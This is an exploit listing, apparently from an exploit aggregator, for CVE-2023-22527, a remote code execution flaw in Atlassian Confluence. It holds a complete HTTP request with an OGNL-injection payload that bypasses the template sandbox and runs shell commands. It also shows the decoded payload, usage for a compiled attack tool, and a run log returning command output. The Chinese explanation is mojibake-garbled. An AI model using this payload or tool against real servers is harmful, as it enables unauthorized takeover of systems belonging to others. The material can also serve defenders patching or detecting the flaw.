Share
## https://sploitus.com/exploit?id=3C31249C-F788-51CF-8A6B-0DB72FB8DEF0
# CVE-2023-22527
Atlassian Confluence - Remote Code Execution (CVE-2023-22527)
## Poc
```http
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
```
[vulhub](https://github.com/vulhub/vulhub/blob/master/confluence/CVE-2023-22527/README.zh-cn.md) ๆๅ็็ป่ฟๆนๅผ
ๅจConfluence 7.18.0็ๆฌๅ๏ผๅฎๆนๅผๅ่
ไธบๅ
ถๅผๅ
ฅไบ`isSafeExpression`ๅฝๆฐๆฅ้ๅถๆง่กๆถๆOGNL่กจ่พพๅผใๅฎๅ
จ็ ็ฉถ่
[Alvaro Muรฑoz](https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/)ๅไบซไบไธ็งๅฉ็จvelocityๆจกๆฟไธญ็`#request['.KEY_velocity.struts2.context'].internalGet('ognl').findValue(String, Object)`ๆฅ่ทๅๆ ๆฒ็ฎฑ็OGNLๅฏน่ฑกๅนถๆง่กไปปๆ่ฏญๅฅ็็ป่ฟๆนๆณ๏ผๅฎๆดๅนถ่งฃ็ ๅ็Payloadๅฆไธ๏ผ
```http
'+(#request['.KEY_velocity.struts2.context'].internalGet('ognl').findValue(@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"})),{}))+'
```
## Usage
```powershell
โโโโโโโโโโ โโโโโโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโ โโโโโโโโ
โโโโโโโโโโโ โโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ โโโ โโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโ โโโโโโโ โโโโโโโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโ โโโโโโโ โโโโ
โโโ โโโโ โโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโ โโโโ
โโโโโโโโ โโโโโโโ โโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ
โโโโโโโ โโโโโ โโโโโโโโ โโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ
@Auth: C1ph3rX13
@Blog: https://c1ph3rx13.github.io
@Note: Atlassian Confluence - Remote Code Execution (CVE-2023-22527)
@Warn: ไปฃ็ ไป
ไพๅญฆไน ไฝฟ็จ๏ผ่ฏทๅฟ็จไบๅ
ถไป็จ้
Usage of CVE-2023-22527.exe:
-c string
Command
-p string
Proxy Url
-t string
Target Url
```
## Run
```powershell
CVE-2023-22527.exe -t http://127.0.0.1:8090 -c "id"
โโโโโโโโโโ โโโโโโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโ โโโโโโโโ
โโโโโโโโโโโ โโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ โโโ โโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโ โโโโโโโ โโโโโโโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโ โโโโโโโ โโโโ
โโโ โโโโ โโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโ โโโโ
โโโโโโโโ โโโโโโโ โโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ
โโโโโโโ โโโโโ โโโโโโโโ โโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ
@Auth: C1ph3rX13
@Blog: https://c1ph3rx13.github.io
@Note: Atlassian Confluence - Remote Code Execution (CVE-2023-22527)
@Warn: ไปฃ็ ไป
ไพๅญฆไน ไฝฟ็จ๏ผ่ฏทๅฟ็จไบๅ
ถไป็จ้
2024-01-23 16:53:16 INFO [+] RCE Result: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence),0(root)
```